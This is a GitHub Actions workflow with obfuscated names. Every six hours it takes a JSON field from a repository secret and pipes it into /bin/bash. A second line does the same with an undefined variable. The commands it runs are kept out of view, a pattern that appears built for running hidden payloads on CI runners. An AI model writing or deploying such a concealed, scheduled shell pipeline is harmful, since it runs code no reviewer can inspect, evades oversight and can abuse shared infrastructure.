name: fawumubiao

on:
  workflow_dispatch:
  schedule:
    - cron: '57 0/6 * * *'
jobs:  # 12389
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fawumubiao
        env:
          a7: ${{ secrets.a7 }}
        run: |
          echo $a7 | jq -r .pms5 | /bin/bash
          echo $van9691 | jq -r .qd78224 | /bin/bash

